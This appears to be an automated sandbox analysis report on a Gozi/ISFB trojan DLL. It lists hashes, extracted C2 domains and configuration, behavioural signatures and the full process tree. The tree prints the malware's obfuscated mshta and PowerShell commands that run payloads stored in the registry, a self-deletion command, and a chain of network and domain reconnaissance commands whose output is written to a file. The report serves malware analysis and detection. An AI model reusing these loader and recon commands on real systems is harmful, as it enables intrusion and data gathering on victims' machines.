Analysis
- max time kernel: 151s
- max time network: 124s
- platform: windows10_x64
- resource: win10-en-20211208
- submitted: 24/01/2022, 10:09

- Static task: static1
- Behavioral task: behavioral1
- Sample: 61ee6edf7de65.dll
- Resource: win7-en-20211208
- 0 signatures, 0 seconds
General
- Target: 61ee6edf7de65.dll
- Size: 95KB
- MD5: b6f0fc5638a110abac1a54805f77e786
- SHA1: f7eff5f67b1b794759ec0ba9b0d6a3bd5cd59bfe
- SHA256: 06e26611fe5cf2fb04cfa894f9cb24edc0ab8306cf42c979b2c776372d07d1cf
- SHA512: b92f671821476bb041bd96a38b1ff300365d12d2fb6bec6266cfbd0f7613a3551807ddc3887ebee13911843322c3274af2a65ca1c38291b45506b433cccd15a8
Malware Config

Extracted
- Family: gozi_ifsb
- Botnet: 20000
- C2: giporedtrip.at, habpfans.at
- Attributes:
  - base_path: /drew/
  - build: 260224
  - exe_type: loader
  - extension: .jlk
  - server_id: 50
- rsa_pubkey.plain
- aes.plain

Extracted
- Family: gozi_ifsb
- Botnet: 20000
- C2: giporedtrip.at, habpfans.at
- Attributes:
  - base_path: /images/
  - build: 260224
  - exe_type: worker
  - extension: .jlk
  - server_id: 50
- rsa_pubkey.plain
- aes.plain
- rsa_pubkey.plain
Signatures

Blocklisted process makes network request (3 IoCs)
- flow 23, pid 3140, rundll32.exe
- flow 24, pid 3140, rundll32.exe
- flow 25, pid 3140, rundll32.exe

Suspicious use of SetThreadContext (6 IoCs)
- PID 3008 (powershell.exe) set thread context of 3020 (procid_target 34)
- PID 3020 (Explorer.EXE) set thread context of 2304 (procid_target 79)
- PID 3020 (Explorer.EXE) set thread context of 3492 (procid_target 32)
- PID 2304 (cmd.exe) set thread context of 1928 (procid_target 81)
- PID 3020 (Explorer.EXE) set thread context of 1576 (procid_target 89)
- PID 3020 (Explorer.EXE) set thread context of 3204 (procid_target 92)

Enumerates physical storage devices (1 TTPs)
- Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Discovers systems in the same network (1 TTPs, 3 IoCs)
- pid 1424, net.exe
- pid 1256, net.exe
- pid 2352, net.exe

Enumerates processes with tasklist (1 TTPs, 1 IoCs)
- pid 2124, tasklist.exe

Gathers system information (1 TTPs, 1 IoCs)
- Runs systeminfo.exe.
- pid 1972, systeminfo.exe

Runs net.exe

Runs ping.exe (1 TTPs, 1 IoCs)
- pid 1928, PING.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
- pid 1928, PING.EXE

Suspicious behavior: EnumeratesProcesses (64 IoCs)
- pid 3140, rundll32.exe (2 entries)
- pid 3008, powershell.exe (3 entries)
- pid 3020, Explorer.EXE (the remaining 59 entries)

Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
- pid 3020, Explorer.EXE

Suspicious behavior: MapViewOfSection (6 IoCs)
- pid 3008, powershell.exe
- pid 3020, Explorer.EXE (2 entries)
- pid 2304, cmd.exe
- pid 3020, Explorer.EXE (2 entries)

Suspicious use of AdjustPrivilegeToken (12 IoCs)
- Token: SeDebugPrivilege, pid 3008, powershell.exe
- Token: SeShutdownPrivilege, pid 3020, Explorer.EXE (5 entries)
- Token: SeCreatePagefilePrivilege, pid 3020, Explorer.EXE (5 entries)
- Token: SeDebugPrivilege, pid 2124, tasklist.exe

Suspicious use of SetWindowsHookEx (1 IoCs)
- pid 3020, Explorer.EXE

Suspicious use of WriteProcessMemory (64 IoCs; repeated entries grouped, with counts)
- PID 3804 (rundll32.exe) wrote to memory of 3140 (procid_target 68), 3 entries
- PID 3728 (mshta.exe) wrote to memory of 3008 (procid_target 73), 2 entries
- PID 3008 (powershell.exe) wrote to memory of 1224 (procid_target 75), 2 entries
- PID 1224 (csc.exe) wrote to memory of 692 (procid_target 76), 2 entries
- PID 3008 (powershell.exe) wrote to memory of 4028 (procid_target 77), 2 entries
- PID 4028 (csc.exe) wrote to memory of 1252 (procid_target 78), 2 entries
- PID 3008 (powershell.exe) wrote to memory of 3020 (procid_target 34), 4 entries
- PID 3020 (Explorer.EXE) wrote to memory of 2304 (procid_target 79), 5 entries
- PID 3020 (Explorer.EXE) wrote to memory of 3492 (procid_target 32), 4 entries
- PID 2304 (cmd.exe) wrote to memory of 1928 (procid_target 81), 5 entries
- PID 3020 (Explorer.EXE) wrote to memory of 3260 (procid_target 82), 2 entries
- PID 3260 (cmd.exe) wrote to memory of 2816 (procid_target 84), 2 entries
- PID 3020 (Explorer.EXE) wrote to memory of 2892 (procid_target 85), 2 entries
- PID 3020 (Explorer.EXE) wrote to memory of 2028 (procid_target 87), 2 entries
- PID 3020 (Explorer.EXE) wrote to memory of 1576 (procid_target 89), 5 entries
- PID 2028 (cmd.exe) wrote to memory of 1972 (procid_target 90), 2 entries
- PID 3020 (Explorer.EXE) wrote to memory of 3204 (procid_target 92), 6 entries
- PID 3020 (Explorer.EXE) wrote to memory of 1748 (procid_target 96), 2 entries
- PID 3020 (Explorer.EXE) wrote to memory of 756 (procid_target 98), 2 entries
- PID 756 (cmd.exe) wrote to memory of 1424 (procid_target 100), 2 entries
- PID 3020 (Explorer.EXE) wrote to memory of 1792 (procid_target 101), 2 entries
- PID 3020 (Explorer.EXE) wrote to memory of 2676 (procid_target 103), 2 entries
- PID 2676 (cmd.exe) wrote to memory of 436 (procid_target 105), 2 entries
Processes (image path, PID, command line; nested entries are child processes and triggered signatures)

- C:\Windows\System32\RuntimeBroker.exe (PID:3492): C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\Explorer.EXE (PID:3020): C:\Windows\Explorer.EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\rundll32.exe (PID:3804): rundll32.exe C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll,#1
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\rundll32.exe (PID:3140): rundll32.exe C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll,#1
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\System32\mshta.exe (PID:3728): "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Luo9='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Luo9).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\EC96820B-5BA5-FE9A-45E0-BF1249146366\\\PictureSettings'));if(!window.flag)close()</script>"
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID:3008): "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vawdrha -value gp; new-alias -name yhwgucfiht -value iex; yhwgucfiht ([System.Text.Encoding]::ASCII.GetString((vawdrha "HKCU:Software\AppDataLow\Software\Microsoft\EC96820B-5BA5-FE9A-45E0-BF1249146366").ClassComputer))
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID:1224): "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jvwlcj2l\jvwlcj2l.cmdline"
        - Suspicious use of WriteProcessMemory
        - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID:692): C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC0BC.tmp" "c:\Users\Admin\AppData\Local\Temp\jvwlcj2l\CSC2A5D04B931C94D14B25922087C28C88.TMP"
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID:4028): "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\13c1wxhm\13c1wxhm.cmdline"
        - Suspicious use of WriteProcessMemory
        - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID:1252): C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC1D5.tmp" "c:\Users\Admin\AppData\Local\Temp\13c1wxhm\CSC393C66B810BE4D87BEC6A12440B7368.TMP"
  - C:\Windows\System32\cmd.exe (PID:2304): "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll"
    - Suspicious use of SetThreadContext
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\PING.EXE (PID:1928): ping localhost -n 5
      - Runs ping.exe
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
  - C:\Windows\system32\cmd.exe (PID:3260): cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\B9E4.bi1"
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\nslookup.exe (PID:2816): nslookup myip.opendns.com resolver1.opendns.com
  - C:\Windows\system32\cmd.exe (PID:2892): cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B9E4.bi1"
  - C:\Windows\system32\cmd.exe (PID:2028): cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\2039.bin1"
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\systeminfo.exe (PID:1972): systeminfo.exe
      - Gathers system information
  - C:\Program Files\Windows Mail\WinMail.exe (PID:1576): "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
  - C:\Windows\syswow64\cmd.exe (PID:3204): "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
  - C:\Windows\system32\cmd.exe (PID:1748): cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
  - C:\Windows\system32\cmd.exe (PID:756): cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net.exe (PID:1424): net view
      - Discovers systems in the same network
  - C:\Windows\system32\cmd.exe (PID:1792): cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
  - C:\Windows\system32\cmd.exe (PID:2676): cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\nslookup.exe (PID:436): nslookup 127.0.0.1
  - C:\Windows\system32\cmd.exe (PID:2144): cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
  - C:\Windows\system32\cmd.exe (PID:2460): cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
    - C:\Windows\system32\tasklist.exe (PID:2124): tasklist.exe /SVC
      - Enumerates processes with tasklist
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe (PID:1732): cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
  - C:\Windows\system32\cmd.exe (PID:1576): cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
    - C:\Windows\system32\driverquery.exe (PID:708): driverquery.exe
  - C:\Windows\system32\cmd.exe (PID:2244): cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
  - C:\Windows\system32\cmd.exe (PID:4016): cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
    - C:\Windows\system32\reg.exe (PID:2624): reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
  - C:\Windows\system32\cmd.exe (PID:2172): cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
  - C:\Windows\system32\cmd.exe (PID:2700): cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
    - C:\Windows\system32\net.exe (PID:1908): net config workstation
      - C:\Windows\system32\net1.exe (PID:2272): C:\Windows\system32\net1 config workstation
  - C:\Windows\system32\cmd.exe (PID:3992): cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
  - C:\Windows\system32\cmd.exe (PID:872): cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
    - C:\Windows\system32\nltest.exe (PID:3696): nltest /domain_trusts
  - C:\Windows\system32\cmd.exe (PID:1076): cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
  - C:\Windows\system32\cmd.exe (PID:1744): cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
    - C:\Windows\system32\nltest.exe (PID:1692): nltest /domain_trusts /all_trusts
  - C:\Windows\system32\cmd.exe (PID:1928): cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
  - C:\Windows\system32\cmd.exe (PID:912): cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
    - C:\Windows\system32\net.exe (PID:1256): net view /all /domain
      - Discovers systems in the same network
  - C:\Windows\system32\cmd.exe (PID:1972): cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
  - C:\Windows\system32\cmd.exe (PID:2316): cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
    - C:\Windows\system32\net.exe (PID:2352): net view /all
      - Discovers systems in the same network
  - C:\Windows\system32\cmd.exe (PID:3048): cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
  - C:\Windows\system32\cmd.exe (PID:2240): cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\2039.bin1 > C:\Users\Admin\AppData\Local\Temp\2039.bin & del C:\Users\Admin\AppData\Local\Temp\2039.bin1"